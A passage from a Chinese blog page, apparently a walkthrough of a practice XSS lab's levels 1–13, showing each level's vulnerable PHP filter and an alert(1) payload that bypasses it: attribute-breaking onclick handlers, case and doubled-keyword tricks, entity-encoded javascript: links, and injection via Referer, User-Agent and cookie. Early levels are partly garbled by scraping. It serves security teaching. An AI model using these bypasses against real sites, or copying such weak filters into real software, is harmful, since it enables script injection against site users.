XSS闯关小游戏(level1~13)

2023-11-24 14:33:15
level1

源代码
```
欢迎用户".$str."";
?>
```
通过源代码发现此关没有对输入的name值做任何过滤，直接echo出来
寻找输入点和输出点
构造payload
```
<script>alert(1)script>
```
level2

源代码
```
没有找到和".htmlspecialchars($str)."相关的结果.".'




';
?>
```
此关使用了htmlspecialchars()函数---->把html标签转化为浏览器不能识别的字符，利用这个函数转化以后，html标签就可以在浏览器原样输出了。
输入输出点
构建payload 1" οnclick="alert(1)
 
level3 
 查看页面源代码
 没有找到和".htmlspecialchars($str)."相关的结果."."




";
?>
  可以发现在
和处都使用了htmlspecialchars()函数
 
 
 输入输出点
 
 
 构建payload
 1' οnclick='alert(1)
 
  
level4 
 查看页面源代码
 ","",$str);
$str3=str_replace("<","",$str2);
echo "没有找到和".htmlspecialchars($str)."相关的结果.
".'




';
?>
  此关使用str_replace()对用户输入进行了过滤，将<、>替换成空
 
 
 输入输出点
 
 
 构建payload
 1" οnclick="alert(1)
 
  
level5 
 查看源代码
 没有找到和".htmlspecialchars($str)."相关的结果.".'




';
?>
  此关使用str_replace()对用户输入进行了过滤，将替换成、on替换成o_n。并使用strtolower()对用户输入数据进行小写转义
 
 
 查看输入输出
 
 
 构造payload
 1">
</code></pre> <p><img referrerpolicy="no-referrer" src="https://img-blog.csdnimg.cn/img_convert/c5ae7f9275dc5fb60d5fbb6d96a28a8b.png" alt="image-20230204101607693" /></p> </li></ul> 
<h4><a id="level6_175"></a>level6</h4> 
<ul><li> <p>查看源代码</p> <pre><code class="prism language-php+HTML"><?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str2=str_replace("<script","<scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level6.php method=GET>
<input name=keyword  value="'.$str6.'">
<input type=submit name=submit value=搜索 />
</form>
</center>';
?>
</code></pre> <blockquote> <p>此关过滤了<code><script</code>、<code>on</code>、<code>src</code>、<code>data</code>、<code>href</code>字符</p> </blockquote> </li><li> <p>查看输入输出</p> <p><img referrerpolicy="no-referrer" src="https://img-blog.csdnimg.cn/img_convert/10b241de7e89bd32f52968b5dc612b2e.png" alt="image-20230204102023045" /></p> </li><li> <p>构造payload</p> <pre><code>1" Onclick="alert(1)
</code></pre> <p><img referrerpolicy="no-referrer" src="https://img-blog.csdnimg.cn/img_convert/5568360826f35e29b95400a6b4a81fe9.png" alt="image-20230204102917574" /></p> </li></ul> 
<h4><a id="level7_213"></a>level7</h4> 
<ul><li> <p>查看源代码</p> <pre><code class="prism language-php+HTML"><?php 
ini_set("display_errors", 0);
$str =strtolower( $_GET["keyword"]);
$str2=str_replace("script","",$str);
$str3=str_replace("on","",$str2);
$str4=str_replace("src","",$str3);
$str5=str_replace("data","",$str4);
$str6=str_replace("href","",$str5);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level7.php method=GET>
<input name=keyword  value="'.$str6.'">
<input type=submit name=submit value=搜索 />
</form>
</center>';
?>
</code></pre> <blockquote> <p>此关过滤了<code><script</code>、<code>on</code>、<code>src</code>、<code>data</code>、<code>href</code>字符，并且对用户输入进行小写转义</p> </blockquote> </li><li> <p>查看输入输出</p> <p><img referrerpolicy="no-referrer" src="https://img-blog.csdnimg.cn/img_convert/f371e92b7974c44d6fc7e1579d8f060d.png" alt="image-20230204103203997" /></p> </li><li> <p>构造payload</p> <pre><code>1" oonnclick="alert(1)
</code></pre> <p><img referrerpolicy="no-referrer" src="https://img-blog.csdnimg.cn/img_convert/76a80b671e7f6532a42d1115cddbcef9.png" alt="image-20230204103142629" /></p> </li></ul> 
<h4><a id="level8_253"></a>level8</h4> 
<ul><li> <p>查看源代码</p> <pre><code class="prism language-php+HTML"><?php 
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','&quot',$str6);
echo '<center>
<form action=level8.php method=GET>
<input name=keyword  value="'.htmlspecialchars($str).'">
<input type=submit name=submit value=添加友情链接 />
</form>
</center>';
?>
<?phpecho '<center><BR><a href="" .$str7.'">友情链接</a></center>';
?>
</code></pre> <blockquote> <p>此关过滤了<code>script</code>、<code>on</code>、<code>src</code>、<code>data</code>、<code>href</code>、<code>"</code>字符，对用户输入进行小写转义</p> </blockquote> </li><li> <p>查看输入输出</p> <p><img referrerpolicy="no-referrer" src="https://img-blog.csdnimg.cn/img_convert/7d50d37b853a1606beaf55052ebce9c4.png" alt="image-20230204104349905" /></p> </li><li> <p>构造payload</p> <pre><code class="prism language-html"># 尝试将敏感字符转换为HTML实体字符
javascrip<span class="token entity" title="t">&#x74;</span>:alert(1)
</code></pre> <p><img referrerpolicy="no-referrer" src="https://img-blog.csdnimg.cn/img_convert/3c9d90ee05d6c36fb813219101d90c7e.png" alt="image-20230204105619687" /></p> </li></ul> 
<h4><a id="level9_296"></a>level9</h4> 
<ul><li> <p>查看源代码</p> <pre><code class="prism language-php+HTML"><?php 
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','&quot',$str6);
echo '<center>
<form action=level9.php method=GET>
<input name=keyword  value="'.htmlspecialchars($str).'">
<input type=submit name=submit value=添加友情链接 />
</form>
</center>';
?>
<?php
if(false===strpos($str7,'http://'))
{echo '<center><BR><a href="您的链接不合法？有没有！" >友情链接</a></center>';}
else
{echo '<center><BR><a href="" .$str7.'">友情链接</a></center>';
}
?>
</code></pre> <blockquote> <p>此关对用户输入进行小写转义，过滤了<code>script</code>、<code>on</code>、<code>src</code>、<code>data</code>、<code>href</code>、<code>"</code>字符</p> <p><code>strpos()</code>函数是用来查找字符串首次出现的位置，返回类型为int，但是如是找不到该字符，返回布尔型的false值。</p> </blockquote> </li><li> <p>查看输入输出</p> <p><img referrerpolicy="no-referrer" src="https://img-blog.csdnimg.cn/img_convert/1e9939e44dac74da92820cefbd7b52b6.png" alt="image-20230204112242837" /></p> </li><li> <p>构造payload</p> <pre><code>javasc&#x72;ipt:alert(1)//http://
</code></pre> <p><img referrerpolicy="no-referrer" src="https://img-blog.csdnimg.cn/img_convert/4b5f8caf0e0a8bb626e06d7d761267ca.png" alt="image-20230204112154010" /></p> </li></ul> 
<h4><a id="level10_347"></a>level10</h4> 
<ul><li> <p>查看源代码</p> <pre><code class="prism language-php+HTML"><?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str11 = $_GET["t_sort"];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link"  value="'.'" type="hidden">
<input name="t_history"  value="'.'" type="hidden">
<input name="t_sort"  value="'.$str33.'" type="hidden">
</form>
</center>';
?>
</code></pre> <blockquote> <p>此关使用GET请求获取keyword的值，但无法使用keyword传值，尝试使用t_sort</p> <p>将<code><</code>、<code>></code>替换成空</p> </blockquote> </li><li> <p>查看输入输出</p> <p><img referrerpolicy="no-referrer" src="https://img-blog.csdnimg.cn/img_convert/dc0717e8e7c4e1307b603b1420f85117.png" alt="image-20230204113838265" /></p> </li><li> <p>构造payload</p> <pre><code>t_sort=1" type="text" onclick="alert(1) 
</code></pre> <p><img referrerpolicy="no-referrer" src="https://img-blog.csdnimg.cn/img_convert/5d40091908c3e4513fd6d257b8ec437b.png" alt="image-20230204113815367" /></p> </li></ul> 
<h4><a id="level11_388"></a>level11</h4> 
<ul><li> <p>查看源代码</p> <pre><code class="prism language-php+HTML"><?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_SERVER['HTTP_REFERER'];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link"  value="'.'" type="hidden">
<input name="t_history"  value="'.'" type="hidden">
<input name="t_sort"  value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_ref"  value="'.$str33.'" type="hidden">
</form>
</center>';
?>
</code></pre> <blockquote> <p>根据源代码，此关只能使用<code>HTTP_REFERER</code>传值</p> </blockquote> </li><li> <p>查看输入输出</p> <p><img referrerpolicy="no-referrer" src="https://img-blog.csdnimg.cn/img_convert/9783eb0e6a7f4ec23d3a4a864ee2d80d.png" alt="image-20230204114441280" /></p> </li><li> <p>构造payload</p> <pre><code>Referer:1" type="text" onclick="alert(1)
</code></pre> <p><img referrerpolicy="no-referrer" src="https://img-blog.csdnimg.cn/img_convert/171da9c599a24c6a85e8a7cb6a4f93f7.png" alt="image-20230204114542722" /></p> </li></ul> 
<h4><a id="level12_427"></a>level12</h4> 
<ul><li> <p>查看源代码</p> <pre><code class="prism language-php+HTML"><?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_SERVER['HTTP_USER_AGENT'];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link"  value="'.'" type="hidden">
<input name="t_history"  value="'.'" type="hidden">
<input name="t_sort"  value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_ua"  value="'.$str33.'" type="hidden">
</form>
</center>';
?>
</code></pre> <blockquote> <p>根据源代码，此关只能使用<code>HTTP_USER_AGENT</code>传值</p> </blockquote> </li><li> <p>查看输入输出</p> <p><img referrerpolicy="no-referrer" src="https://img-blog.csdnimg.cn/img_convert/d3caf4ed617bc57ddf77aff13d04ebce.png" alt="image-20230204115002808" /></p> </li><li> <p>构造payload</p> <pre><code>1" type="text" onclick="alert(1)
</code></pre> <p><img referrerpolicy="no-referrer" src="https://img-blog.csdnimg.cn/img_convert/67094996471d1aecbf44cb7463875ac5.png" alt="image-20230204115049287" /></p> </li></ul> 
<h4><a id="level13_466"></a>level13</h4> 
<ul><li> <p>查看源代码</p> <pre><code class="prism language-php+HTML"><?php 
setcookie("user", "call me maybe?", time()+3600);
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_COOKIE["user"];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link"  value="'.'" type="hidden">
<input name="t_history"  value="'.'" type="hidden">
<input name="t_sort"  value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_cook"  value="'.$str33.'" type="hidden">
</form>
</center>';
?>
</code></pre> <blockquote> <p>根据源代码，此关只能使用<code>COOKIE</code>传值</p> </blockquote> </li><li> <p>查看输入输出</p> <p><img referrerpolicy="no-referrer" src="https://img-blog.csdnimg.cn/img_convert/c48ba4eedd6e020581508484fcb6c0b7.png" alt="image-20230204115315586" /></p> </li><li> <p>构造payload</p> <pre><code>1" type="text" onclick="alert(1)
</code></pre> <p><img referrerpolicy="no-referrer" src="https://img-blog.csdnimg.cn/img_convert/810d44c3f1c6f3e42a48d462c1740148.png" alt="image-20230204115358712" /></p> </li></ul>                        </p>
                        <p><br /><pre><code style="font-size:16px;">本文来自互联网用户投稿，文章观点仅代表作者本人，不代表本站立场，不承担相关法律责任。如若转载，请注明出处。 如若内容造成侵权/违法违规/事实不符，请点击<a
                            href="https://shimo.im/forms/N2A1gvJRpPh7K9qD/fill" target="_blank" rel="nofollow">【内容举报】</a>进行投诉反馈！</code></pre></p>
                        <!-- E 正文 -->
                        <link href="https://qiniu.techgrow.cn/readmore/dist/readmore.css" type="text/css" rel="stylesheet">
<script src="https://qiniu.techgrow.cn/readmore/dist/readmore.js" type="text/javascript"></script>
<script>
    var regex = /(phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone)/i
    var isMobile = navigator.userAgent.match(regex);
    if (!isMobile) {
        try {
            var plugin = new ReadmorePlugin();
            plugin.init({
                id: "readmore-container",
                blogId: "55721-7689706765131-406",
                name: "财经早读",
                keyword: "666",
                qrcode: "https://www.imspm.com/assets/img/caijingzaodu.jpg",
                type: "website",
                height: "auto",
                expires: "7",
                interval: "60",
                random: "1"
            })
        } catch (e) {
            console.warn("readmore plugin occurred error: " + e.name + " | " + e.message);
        }
    }
</script>                    </div>

                    <!-- S 付费阅读 -->
<!-- E 付费阅读 -->


                    <!-- S 点赞 -->
<div class="article-donate">
    <a href="javascript:" class="btn btn-primary btn-like btn-lg social-share-icon icon-heart addbookbark" data-type="archives" data-aid="730927" data-action="/addons/cms/ajax/collection.html">收藏</a>
    </div>
<!-- E 点赞 -->


                    <div class="entry-meta">
    <ul>
        <!-- S 归档 -->
        <li>标签：<a href="/dev.html" class="tag" rel="tag" target="_blank">技术</a></li>
        <!-- S 归档 -->
    </ul>

    <ul class="article-prevnext">
        <!-- S 上一篇下一篇 -->
                <li>
            <span>上一篇 &gt;</span>
            <a href="/dev/730926.html" target="_blank">Fundebug微信小程序BUG监控服务支持Source Map</a>
        </li>
                <li>
            <span>下一篇 &gt;</span>
            <a href="/dev/730928.html" target="_blank">notepad++ 代码带颜色</a>
        </li>
                <!-- E 上一篇下一篇 -->
    </ul>
</div>


                    <div class="related-article">
    <div class="row" style="margin: 0 -15px;">
        <!-- S 相关文章 -->
        <div class="col-xs-12">
            <h3 style="font-size: 1.1em;">相关文章</h5>
        </div>
                <div class="col-xs-12">
            <p style="margin-top: 17px;margin-bottom: 8.5px;"><a href="/dev/747938.html" target="_blank">Duilib中list控件支持ctrl和shif多行选中的实现</a></p>
        </div>
                <div class="col-xs-12">
            <p style="margin-top: 17px;margin-bottom: 8.5px;"><a href="/dev/747937.html" target="_blank">[ICML2015]Batch Normalization:Accelerating Deep Network Training by Reducing Internal Covariate Shif</a></p>
        </div>
                <div class="col-xs-12">
            <p style="margin-top: 17px;margin-bottom: 8.5px;"><a href="/dev/747936.html" target="_blank">win10系统 微软输入法 于eclipse ctrl+shif+f冲突间接处理办法</a></p>
        </div>
                <div class="col-xs-12">
            <p style="margin-top: 17px;margin-bottom: 8.5px;"><a href="/dev/747935.html" target="_blank">Codeforces Round #259 (Div. 2) B. Little Pony and Sort by Shif</a></p>
        </div>
                <div class="col-xs-12">
            <p style="margin-top: 17px;margin-bottom: 8.5px;"><a href="/dev/747934.html" target="_blank">读LDD3，内存映射与DMA--PAGE_SHIF&hellip;</a></p>
        </div>
                <div class="col-xs-12">
            <p style="margin-top: 17px;margin-bottom: 8.5px;"><a href="/dev/747933.html" target="_blank">VMware虚拟机安装XP【要先分区，再设置BOOT 启动CD，shif+上移】</a></p>
        </div>
                <div class="col-xs-12">
            <p style="margin-top: 17px;margin-bottom: 8.5px;"><a href="/dev/747932.html" target="_blank">更换iBus五笔的左与右Shif</a></p>
        </div>
                <div class="col-xs-12">
            <p style="margin-top: 17px;margin-bottom: 8.5px;"><a href="/dev/747931.html" target="_blank">sublime ctrl+shif+f 没用解决办法</a></p>
        </div>
                <div class="col-xs-12">
            <p style="margin-top: 17px;margin-bottom: 8.5px;"><a href="/dev/747930.html" target="_blank">idea 对 ctrl + z 的撤销 是 ctrl + shif + z</a></p>
        </div>
                <div class="col-xs-12">
            <p style="margin-top: 17px;margin-bottom: 8.5px;"><a href="/dev/747929.html" target="_blank">计算机最早的设计师应用于,计算机应用基础选择题doc.doc</a></p>
        </div>
                <div class="col-xs-12">
            <p style="margin-top: 17px;margin-bottom: 8.5px;"><a href="/dev/747928.html" target="_blank">win10自带截图神器：Win+Shift+S</a></p>
        </div>
                <div class="col-xs-12">
            <p style="margin-top: 17px;margin-bottom: 8.5px;"><a href="/dev/747927.html" target="_blank">Python基础之文件目录操作</a></p>
        </div>
                <div class="col-xs-12">
            <p style="margin-top: 17px;margin-bottom: 8.5px;"><a href="/dev/747926.html" target="_blank">python简述目录_Python基础之文件目录操作(示例代码)</a></p>
        </div>
                <div class="col-xs-12">
            <p style="margin-top: 17px;margin-bottom: 8.5px;"><a href="/dev/747925.html" target="_blank">tp5 如何做数据采集</a></p>
        </div>
                <div class="col-xs-12">
            <p style="margin-top: 17px;margin-bottom: 8.5px;"><a href="/dev/747924.html" target="_blank">任务2-7(服务器字体+阿里巴巴矢量库)</a></p>
        </div>
                <div class="col-xs-12">
            <p style="margin-top: 17px;margin-bottom: 8.5px;"><a href="/dev/747923.html" target="_blank">html标签（1)：h1~h6,p,br,pre,hr</a></p>
        </div>
                <div class="col-xs-12">
            <p style="margin-top: 17px;margin-bottom: 8.5px;"><a href="/dev/747922.html" target="_blank">TI 电量计介绍与芯片选型指南</a></p>
        </div>
                <div class="col-xs-12">
            <p style="margin-top: 17px;margin-bottom: 8.5px;"><a href="/dev/747921.html" target="_blank">几款TI电源芯片简介</a></p>
        </div>
                <div class="col-xs-12">
            <p style="margin-top: 17px;margin-bottom: 8.5px;"><a href="/dev/747920.html" target="_blank">TI DSP芯片C2000系列读取FLASH数据</a></p>
        </div>
                <div class="col-xs-12">
            <p style="margin-top: 17px;margin-bottom: 8.5px;"><a href="/dev/747919.html" target="_blank">德州仪器(Ti)平台嵌入式开发基础</a></p>
        </div>
                <div class="col-xs-12">
            <p style="margin-top: 17px;margin-bottom: 8.5px;"><a href="/dev/747918.html" target="_blank">TI三相电机智能栅极驱动芯片特点分类</a></p>
        </div>
                <div class="col-xs-12">
            <p style="margin-top: 17px;margin-bottom: 8.5px;"><a href="/dev/747917.html" target="_blank">省选模拟（12.08） T3 圈圈圈圈圈圈圈圈</a></p>
        </div>
                <div class="col-xs-12">
            <p style="margin-top: 17px;margin-bottom: 8.5px;"><a href="/dev/747916.html" target="_blank">Hadoop生态圈技术栈（上）</a></p>
        </div>
                <div class="col-xs-12">
            <p style="margin-top: 17px;margin-bottom: 8.5px;"><a href="/dev/747915.html" target="_blank">大数据开发基础入门与项目实战（三）Hadoop核心及生态圈技术栈之6.Impala交互式查询</a></p>
        </div>
                <div class="col-xs-12">
            <p style="margin-top: 17px;margin-bottom: 8.5px;"><a href="/dev/747914.html" target="_blank">小猿圈之Linux下Mysql 操作命令</a></p>
        </div>
                <div class="col-xs-12">
            <p style="margin-top: 17px;margin-bottom: 8.5px;"><a href="/dev/747913.html" target="_blank">大数据Hadoop生态圈常用面试题</a></p>
        </div>
                <div class="col-xs-12">
            <p style="margin-top: 17px;margin-bottom: 8.5px;"><a href="/dev/747912.html" target="_blank">大数据开发基础入门与项目实战（三）Hadoop核心及生态圈技术栈之4.Hive DDL、DQL和数据操作</a></p>
        </div>
                <div class="col-xs-12">
            <p style="margin-top: 17px;margin-bottom: 8.5px;"><a href="/dev/747911.html" target="_blank">备战Noip2018模拟赛11（B组）T3 Monogatari 物语</a></p>
        </div>
                <div class="col-xs-12">
            <p style="margin-top: 17px;margin-bottom: 8.5px;"><a href="/dev/747910.html" target="_blank">【智能优化算法-圆圈搜索算法】基于圆圈搜索算法Circle Search Algorithm求解单目标优化问题附matlab代码</a></p>
        </div>
                <div class="col-xs-12">
            <p style="margin-top: 17px;margin-bottom: 8.5px;"><a href="/dev/747909.html" target="_blank">NYOJ 78 圈水池</a></p>
        </div>
                <div class="col-xs-12">
            <p style="margin-top: 17px;margin-bottom: 8.5px;"><a href="/dev/747908.html" target="_blank">递归问题 跑道 汽车 绕圈问题 Python实现</a></p>
        </div>
                <div class="col-xs-12">
            <p style="margin-top: 17px;margin-bottom: 8.5px;"><a href="/dev/747907.html" target="_blank">Hadoop生态圈（三）：MapReduce</a></p>
        </div>
                <!-- E 相关文章 -->
    </div>
</div>


                    <div class="clearfix"></div>
                </div>
            </div>
        </main>

        <aside class="col-xs-12 col-md-4">
            <!--@formatter:off-->
<!--@formatter:on-->

            <!-- S 内容推荐 -->
<div class="panel panel-default hot-article">
    <div class="panel-heading">
        <h3 class="panel-title">内容推荐</h3>
    </div>
    <div class="panel-body">
                <div class="media media-number">
            <div class="media-left">
                <span class="num tag">1</span>
            </div>
            <div class="media-body">
                <a class="link-dark" href="/jiaohutiyan/753475.html" title="大厂出品！保姆级教程帮你掌握「用户体验要素」" target="_blank">大厂出品！保姆级教程帮你掌握「用户体验要素」</a>
            </div>
        </div>
                <div class="media media-number">
            <div class="media-left">
                <span class="num tag">2</span>
            </div>
            <div class="media-body">
                <a class="link-dark" href="/jiaohutiyan/753348.html" title="大厂实战案例！设计师如何助力京东快递业务增长？" target="_blank">大厂实战案例！设计师如何助力京东快递业务增长？</a>
            </div>
        </div>
                <div class="media media-number">
            <div class="media-left">
                <span class="num tag">3</span>
            </div>
            <div class="media-body">
                <a class="link-dark" href="/jiaohutiyan/753116.html" title="总监干货！5个常见的UI设计规范创建误区" target="_blank">总监干货！5个常见的UI设计规范创建误区</a>
            </div>
        </div>
                <div class="media media-number">
            <div class="media-left">
                <span class="num tag">4</span>
            </div>
            <div class="media-body">
                <a class="link-dark" href="/kaifagongju/752540.html" title="数据库管理利器&mdash;&mdash;Navicat Premium v17.0.4学习版(Windows+MacOS+Linux)" target="_blank">数据库管理利器&mdash;&mdash;Navicat Premium v17.0.4学习版(Windows+MacOS+Linux)</a>
            </div>
        </div>
                <div class="media media-number">
            <div class="media-left">
                <span class="num tag">5</span>
            </div>
            <div class="media-body">
                <a class="link-dark" href="/jiaohutiyan/750353.html" title="进阶必学！快速掌握10种国际主流设计模型" target="_blank">进阶必学！快速掌握10种国际主流设计模型</a>
            </div>
        </div>
                <div class="media media-number">
            <div class="media-left">
                <span class="num tag">6</span>
            </div>
            <div class="media-body">
                <a class="link-dark" href="/jiaohutiyan/750352.html" title="春节期间，10个大厂的产品细节走心设计" target="_blank">春节期间，10个大厂的产品细节走心设计</a>
            </div>
        </div>
                <div class="media media-number">
            <div class="media-left">
                <span class="num tag">7</span>
            </div>
            <div class="media-body">
                <a class="link-dark" href="/jiaohutiyan/747940.html" title="如何帮助用户度过新人期？来看雪球APP的实战总结！" target="_blank">如何帮助用户度过新人期？来看雪球APP的实战总结！</a>
            </div>
        </div>
                <div class="media media-number">
            <div class="media-left">
                <span class="num tag">8</span>
            </div>
            <div class="media-body">
                <a class="link-dark" href="/ruanjianzixun/42357.html" title="Sketch 95.3最新版下载 (Sketch矢量绘图应用软件)" target="_blank">Sketch 95.3最新版下载 (Sketch矢量绘图应用软件)</a>
            </div>
        </div>
                <div class="media media-number">
            <div class="media-left">
                <span class="num tag">9</span>
            </div>
            <div class="media-body">
                <a class="link-dark" href="/ruanjianzixun/42356.html" title="Axure RP 9 最新正式版安装软件与汉化语言包下载(2023年3月30日更新)" target="_blank">Axure RP 9 最新正式版安装软件与汉化语言包下载(2023年3月30日更新)</a>
            </div>
        </div>
                <div class="media media-number">
            <div class="media-left">
                <span class="num tag">10</span>
            </div>
            <div class="media-body">
                <a class="link-dark" href="/chanpinsheji/42343.html" title="嘘！SaaS产品的差异化设计细节，一般人我不告诉他" target="_blank">嘘！SaaS产品的差异化设计细节，一般人我不告诉他</a>
            </div>
        </div>
            </div>
</div>
<!-- E 内容推荐 -->

<div class="panel panel-blockimg">
    <script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-6421005227861480"
    crossorigin="anonymous"></script>
<!-- 右侧正方形 -->
<ins class="adsbygoogle"
    style="display:block"
    data-ad-client="ca-pub-6421005227861480"
    data-ad-slot="1989994359"
    data-ad-format="auto"
    data-full-width-responsive="true"></ins>
<script>
    (adsbygoogle = window.adsbygoogle || []).push({});
</script>
</div>
<div class="panel panel-default lasest-update">
    <!-- S 最近更新 -->
    <div class="panel-heading">
        <h3 class="panel-title">最新更新</h3>
    </div>
    <div class="panel-body">
        <ul class="list-unstyled">
                        <li>
                <span><a href="/chanpinjingli.html" target="_blank">[产品经理]</a></span>
                <a class="link-dark" href="/chanpinjingli/758173.html" title="3分钟绘制流程图！这个AI+绘图工具的神仙组合，学完老板直呼内行" target="_blank">3分钟绘制流程图！这个AI+绘图工具的神仙组合，学完老板直呼内行</a>
            </li>
                        <li>
                <span><a href="/chanpinjingli.html" target="_blank">[产品经理]</a></span>
                <a class="link-dark" href="/chanpinjingli/758172.html" title="商业潜规则：打败你的不是AI，而是人性" target="_blank">商业潜规则：打败你的不是AI，而是人性</a>
            </li>
                        <li>
                <span><a href="/chanpinsheji.html" target="_blank">[产品设计]</a></span>
                <a class="link-dark" href="/chanpinsheji/758171.html" title="DeepSeek+智能派单系统的实践分享" target="_blank">DeepSeek+智能派单系统的实践分享</a>
            </li>
                        <li>
                <span><a href="/chanpinjingli.html" target="_blank">[产品经理]</a></span>
                <a class="link-dark" href="/chanpinjingli/758170.html" title="一文读懂本年实际损益借(贷)方发生额" target="_blank">一文读懂本年实际损益借(贷)方发生额</a>
            </li>
                        <li>
                <span><a href="/chuangyexueyuan.html" target="_blank">[创业学院]</a></span>
                <a class="link-dark" href="/chuangyexueyuan/758169.html" title="大客户 vs 中小企业：需求竟天差地别？以企业培训数字化为例" target="_blank">大客户 vs 中小企业：需求竟天差地别？以企业培训数字化为例</a>
            </li>
                        <li>
                <span><a href="/chanpinjingli.html" target="_blank">[产品经理]</a></span>
                <a class="link-dark" href="/chanpinjingli/758168.html" title="不要将员工的&ldquo;猴子&rdquo;背到自己身上：职场管理中的权责划分" target="_blank">不要将员工的&ldquo;猴子&rdquo;背到自己身上：职场管理中的权责划分</a>
            </li>
                        <li>
                <span><a href="/chanpinjingli.html" target="_blank">[产品经理]</a></span>
                <a class="link-dark" href="/chanpinjingli/758167.html" title="人工智能的三层架构：从应用层到基础服务层，解密智能革命" target="_blank">人工智能的三层架构：从应用层到基础服务层，解密智能革命</a>
            </li>
                        <li>
                <span><a href="/chanpinsheji.html" target="_blank">[产品设计]</a></span>
                <a class="link-dark" href="/chanpinsheji/758166.html" title="一文讲清楚iOS的SKAN4.0" target="_blank">一文讲清楚iOS的SKAN4.0</a>
            </li>
                    </ul>
    </div>
    <!-- E 最近更新 -->
</div>
<!-- S 热门标签 -->
<div class="panel panel-default hot-tags">
    <div class="panel-heading">
        <h3 class="panel-title">热门标签</h3>
    </div>
    <div class="panel-body">
        <div class="tags">
                        <a href="/channel/数量.html" class="tag" target="_blank"> <span>数量</span></a>
                        <a href="/channel/AI技术趋势.html" class="tag" target="_blank"> <span>AI技术趋势</span></a>
                        <a href="/channel/用户角色.html" class="tag" target="_blank"> <span>用户角色</span></a>
                        <a href="/channel/心智游移.html" class="tag" target="_blank"> <span>心智游移</span></a>
                        <a href="/channel/自然生态系统.html" class="tag" target="_blank"> <span>自然生态系统</span></a>
                        <a href="/channel/会员权益.html" class="tag" target="_blank"> <span>会员权益</span></a>
                        <a href="/channel/AirDrop.html" class="tag" target="_blank"> <span>AirDrop</span></a>
                        <a href="/channel/hashmap.html" class="tag" target="_blank"> <span>hashmap</span></a>
                        <a href="/channel/小龙虾.html" class="tag" target="_blank"> <span>小龙虾</span></a>
                        <a href="/channel/焦虑.html" class="tag" target="_blank"> <span>焦虑</span></a>
                        <a href="/channel/危机处理.html" class="tag" target="_blank"> <span>危机处理</span></a>
                        <a href="/channel/发展.html" class="tag" target="_blank"> <span>发展</span></a>
                        <a href="/channel/微信群折叠.html" class="tag" target="_blank"> <span>微信群折叠</span></a>
                        <a href="/channel/toast.html" class="tag" target="_blank"> <span>toast</span></a>
                        <a href="/channel/测评新算法.html" class="tag" target="_blank"> <span>测评新算法</span></a>
                        <a href="/channel/改版.html" class="tag" target="_blank"> <span>改版</span></a>
                        <a href="/channel/wireshark.html" class="tag" target="_blank"> <span>wireshark</span></a>
                        <a href="/channel/投放方式.html" class="tag" target="_blank"> <span>投放方式</span></a>
                        <a href="/channel/音频播放动效.html" class="tag" target="_blank"> <span>音频播放动效</span></a>
                        <a href="/channel/timer.html" class="tag" target="_blank"> <span>timer</span></a>
                        <a href="/channel/女性商业.html" class="tag" target="_blank"> <span>女性商业</span></a>
                        <a href="/channel/古典自媒体.html" class="tag" target="_blank"> <span>古典自媒体</span></a>
                        <a href="/channel/海外博主.html" class="tag" target="_blank"> <span>海外博主</span></a>
                        <a href="/channel/repeater.html" class="tag" target="_blank"> <span>repeater</span></a>
                        <a href="/channel/转账.html" class="tag" target="_blank"> <span>转账</span></a>
                        <a href="/channel/万能钥匙.html" class="tag" target="_blank"> <span>万能钥匙</span></a>
                        <a href="/channel/秋招.html" class="tag" target="_blank"> <span>秋招</span></a>
                        <a href="/channel/快服务.html" class="tag" target="_blank"> <span>快服务</span></a>
                        <a href="/channel/个人演讲.html" class="tag" target="_blank"> <span>个人演讲</span></a>
                        <a href="/channel/客户共识.html" class="tag" target="_blank"> <span>客户共识</span></a>
                    </div>
    </div>
</div>
<!-- E 热门标签 -->

        </aside>
    </div>
</div>

</main>

<footer>
    <div id="footer">
        <div class="container">
            <div class="row footer-inner">
                <div class="col-xs-12">
                    <div class="footer-logo pull-left mr-4">
                        <a href="/"><i class="fa fa-bookmark"></i></a>
                    </div>
                    <div class="pull-left">
                        Copyright&nbsp;©&nbsp;2025 All rights reserved. 超级产品经理                        <a href="https://beian.miit.gov.cn" target="_blank" rel="noopener">浙ICP备14026978号-4</a>
